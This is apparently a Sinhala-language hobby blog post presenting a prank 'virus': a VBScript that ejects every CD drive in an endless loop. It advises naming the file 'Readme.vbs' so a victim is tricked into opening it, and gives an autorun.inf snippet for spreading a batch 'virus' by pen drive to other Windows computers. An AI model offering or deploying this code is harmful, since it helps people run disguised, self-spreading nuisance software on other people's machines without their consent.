Header Ads

Breaking News
recent

CD rom එක eject වෙන විදියේ Virus එකක් හදමු. [ How to make a virus that opens and closes your CD drive ]



photomath

නිකං ඉන්න වෙලාවට fun එකට වගේ මෙකත් කරලා බලන්න. මුලින්ම Notepad එක open කරගෙන මේ code එක copy>paste කරගන්න.




Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

දැන් save කරගන්න ඕන මේ විදියට. Readme.vbs හෝ *.vbs දැන් double click කරන්න..
Readme වගේ නමක් දැම්මොත් අනිත් කෙනා අනිවා ලණුව කනවා.

මරු නේ වැඩේ.



 • දැන් මෙක නවත්තන්න task manager එකට (Ctrl+Alt+Del) යන්න
• process tab එක මත click කරන්න


• Select කරලා "Microsoft Windows Based Script Host" එකට හෝ "wscript.exe" එකට End process දෙන්න....




**************************

මේ virus එකක pen drive එකකට දාල අනිත් computers වලට ආසාධනය කරන්න පුලුවන්.

[autorun]
open=test.bat
Icon=test.ico

මේක save කරනකොට ‘autorun.inf’ කියල save කරන්න ‍’test’ කියන තැනට batch virus එකේ නම. ඊට පස්සේ මේ ‘autorun.inf’ එකයි ඔයාගේ virus  එකයි pendrive එකට දාන්න. දැන් pendrive එක windows පරිඝණකයකට සම්බන්ද කරපු ගමන් වැඩේ ගොඩ.

=============================

මේ වගේ Notepad එකෙන් කරන්න පුලුවන් තව ගොඩාක් වැඩ තියෙනවා . මං පුලු පුලුවන් වෙලාවට ඔයාලට එවා ගැන කියලා දෙන්නම්. Notepad එක නිකං වැඩකට නැති දෙයක් කියලා අපිට හිතුනට ඒකෙන්  කරන්න පුලුවන් වැඩ දැක්කම ඔයාලට පුදුමත් හිතේවි.


 

No comments:

Powered by Blogger.